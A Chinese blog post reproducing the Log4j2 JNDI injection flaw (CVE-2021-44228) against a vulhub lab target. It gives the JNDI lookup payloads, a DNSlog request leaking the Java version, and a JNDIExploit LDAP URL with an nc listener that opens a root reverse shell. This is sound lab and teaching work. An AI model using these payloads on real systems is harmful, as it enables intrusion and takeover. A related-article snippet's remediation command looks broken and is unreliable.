Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

最新推荐文章于 2024-07-25 09:35:08 发布
最新推荐文章于 2024-07-25 09:35:08 发布
阅读量76 收藏
点赞数
分类专栏: 漏洞复现 文章标签: apache log4j web安全 威胁分析 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45965246/article/details/132941880
版权

前言

Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。

参考链接:

准备工作

  1. 两台机器:kali攻击机(192.168.30.102)vulhub靶场(192.168.30.155)
  2. DNSlog平台
  3. JNDIExploit攻击注入辅助工具

漏洞复现

1、回显dns记录

在vulhub上开启对应版本的环境,没有环境请参考vulhub环境的搭建

cd vulhub/log4j/CVE-2021-44228/
#启动环境
docker-compose up -d

访问靶机http://192.168.30.155:8983/

file

poc攻击代码

GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.<获取的dns域名>} HTTP/1.1
Host: 192.168.30.155:8983
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close

打开dnslog平台获取对应的子域名http://dnslog.cn/

file

不知道是不是我的使用方式有问题,通过burpsuite无法成功完成实验,尝试手动hackbar发包

打开hackbar,输入以下url地址

http://192.168.30.155:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.npdq4y.dnslog.cn}

file

回头查看dnslog平台即可查看相应的dns记录以及java版本号

file

2、使用工具-反弹shell创建/tmp/success

下载JNDIExploit攻击注入辅助工具

上传到kali

查看工具支持的LDAP格式

java -jar JNDIExploit-1.2-SNAPSHOT.jar -u

file

运行JNDIExploit工具

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.30.102

多开一个窗口进行监听

nc -lvvp 9999

在hackbar上运行如下代码

http://192.168.30.155:8983/solr/admin/cores?action=${jndi:ldap://192.168.30.102:1389/Basic/ReverseShell/192.168.30.102/9999}

kali-ldap服务器响应

file

成功获取shell,而且还是最高权限的root权限

file

创建/tmp/success

touch /tmp/success
ls /tmp/

file

呆宝宝不呆哦~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
apache-log4j-2.16.0-bin.rar
12-17
然而,2021年底,一个严重漏洞被发现,被称为“Log4Shell”或CVE-2021-44228,这个漏洞允许攻击者通过在日志记录中注入恶意代码,实现远程代码执行(RCE),对受影响的系统造成严重威胁。 该漏洞源于Log4j2的一个...
log4j2漏洞终极解决方法 apache-log4j-2.16.0-bin.zip
12-14
这个漏洞,被称为CVE-2021-44228,影响了广泛使用的Java日志框架Apache Log4j2,可能导致远程代码执行(RCE)的风险,让攻击者有机会完全控制受影响的系统。本文将深入探讨Log4j2漏洞的原理、影响范围以及如何进行...
Log4j2之JNDI注入CVE-2021-44228)
GalaxySpaceX的博客
06-25 327
Log4j2之JNDI注入CVE-2021-44228)
Apache Log4j2 lookup JNDI 注入漏洞复现(CVE-2021-44228)
柠檬i的博客
04-24 122
目录: 一、搭建环境1. 首先拉一个docker镜像2. 然后启动环境 二、获取shell首先,试验一下DNSLog1. 准备JNDI注入工具下载进入目录打包成jar包 2. 利用生成payload...
Log4j2的JNDI注入漏洞CVE-2021-44228)
黑白的博客
10-13 5121
好好学习,天天向上。
vulhub中Apache Log4j2 lookup JNDI 注入漏洞CVE-2021-44228)
yougexiaojiuguan的博客
02-19 780
漏洞复现过程的记录
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 7247
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
Apache Log4j2 查找功能 JNDI 注入 (CVE-2021-44228)
Makboli的博客
08-26 1243
Apache Log4j2 查找功能 JNDI 注入 (CVE-2021-44228)
CVE-2021-44228:Apache Log4j2 JNDI注入漏洞
qq_61553520的博客
05-24 1126
Log4j是Apache软件基金会下的一个开源项目,通过使用log4j可以打印程序日志输出信息到控制台,文件等各种地方。简单来说,它是一个用于记录日志的Java第三方库,而且使用量非常广泛。在2021年12月9日,Log4j2爆出极其严重的漏洞,攻击者只需要构造恶意数据植入日志记录中,就可以导致任意代码执行,危害极大,利用门槛极低。
Apache Log4j2 Jndi RCE CVE-2021-44228漏洞原理讲解
m0_62670778的博客
04-06 1295
Log4j2(Log for java)是Apache软件基金会下一个优秀的java程序日志监控组件Log4j2远程代码执行漏洞细节被公开【影响版本Log4j 2.x
Log4j反序列化命令执行漏洞(CVE-2017-5645)&Apache Log4j2 lookup JNDI 注入漏洞CVE-2021-44228)
m0_62207170的博客
08-20 660
CVE-2017-5645&CVE-2021-44228
apache-log4j-2.15.0-rc2-bin.zip
12-10
在2021年12月初,Log4j 发现了一个严重漏洞,被称为CVE-2021-44228,也称为"Log4Shell"。这是一个非常危险的漏洞,因为它允许攻击者通过注入恶意代码到日志记录字符串中,从而实现远程代码执行。一旦攻击成功,黑客...
apache-log4j-2.15.0-src.tar.gz
12-16
Log4j 2.x的早期版本中,发现了一个名为CVE-2021-44228的安全漏洞,也被业界称为"Log4Shell"。这个漏洞是由于Log4j的JNDI(Java Naming and Directory Interface)特性被恶意利用,攻击者可以通过在日志语句中插入...
log4j-api-2.12.4.ja和log4j-core-2.12.4.jar
04-27
提到的"避免log4j漏洞问题"可能指的是在2021年出现的严重安全漏洞——CVE-2021-44228,也被称为Log4Shell。这个漏洞允许攻击者通过注入恶意的JNDI(Java Naming and Directory Interface)链接来执行远程代码。...
从0到1:理发店预约剪发小程序开发笔记(上)
最新发布
CC同学呀
07-25 481
理发师可以在小程序上设置自己的可预约时间,价格,自我介绍,顾客可以根据理发师的日程安排选择合适的时间进行预约和支付。这样可以提高预约的效率,减少沟通成本,方便双方的安排。
Apache2服务介绍
m0_56363537的博客
07-23 1446
互联网上排名第一的 HTTP 服务器,Apache HTTP 服务器项目致力于开发和维护适用于现代操作系统(包括 UNIX 和 Windows)的开源 HTTP 服务器。该项目的目标是提供安全、高效且可扩展的服务器,该服务器提供与当前 HTTP 标准同步的 HTTP 服务。Apache HTTP 服务器(centos中命名为httpd)于 1995 年推出,自 1996 年 4 月以来一直是互联网上最受欢迎的 Web 服务器。2020 年 2 月,它作为一个项目迎来了 25 岁生日。
Apache Filnk----入门
xd__xy的博客
07-23 885
无界数据流:有定义流的开始,但没有定义流的结束;它们会无休止的产生数据:无界流的数据必须持续处理,即数据被摄取后需要立刻处理我们不能等到所有数据都到达再处理,因为输入是无限的。有界数据流:有定义流的开始,也有定义流的结束:有界流可以在摄取所有数据后再进行计算:有界流所有数据可以被排序,所以并不需要有序摄取:有界流处理通常被称为批处理。
apache.commons.pool2 使用指南
AKA石头
07-24 476
apache.commons.pool2 使用指南
apache log4j CVE-2021-44228漏洞怎么解决
06-03
漏洞描述: Apache Log4j 2.x中存在一种命令注入漏洞,攻击者通过构造恶意日志信息,可以在目标服务器上执行任意命令。 解决办法: 1.升级到最新版本 Apache Log4j 2.x发布了修复此漏洞的版本2.17.0,建议用户尽快升级到该版本。 2.使用安全策略文件 在升级之前,可以通过使用安全策略文件来限制日志信息中使用的类和方法,以减少攻击面。可以使用以下命令生成策略文件: ``` java -Dlog4j2.formatMsgNoLookups=true -Dlog4j2.disable.jmx=true -Dlog4j2.benchMillis=100 org.apache.logging.log4j.core.tools.GenerateExtendedLoggerInfo > log4j2-enum-class-loader.policy ``` 然后将策略文件放置在类路径下,例如在Tomcat中,可以将其放置在`$CATALINA_BASE/conf`目录下。 3.禁用Log4j JNDI Lookup功能 如果无法立即升级,可以通过在JVM参数中添加以下选项来禁用Log4j JNDI Lookup功能: ``` -Dlog4j2.formatMsgNoLookups=true ``` 或者在log4j2.xml配置文件中添加以下选项: ``` <Configuration> <properties> <property name="log4j2.formatMsgNoLookups">true</property> </properties> ... </Configuration> ``` 以上是针对Apache Log4j 2.x的解决办法,如果您使用的是其他版本的Log4j,请查看厂商的官方文档或者联系技术支持获取解决办法。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值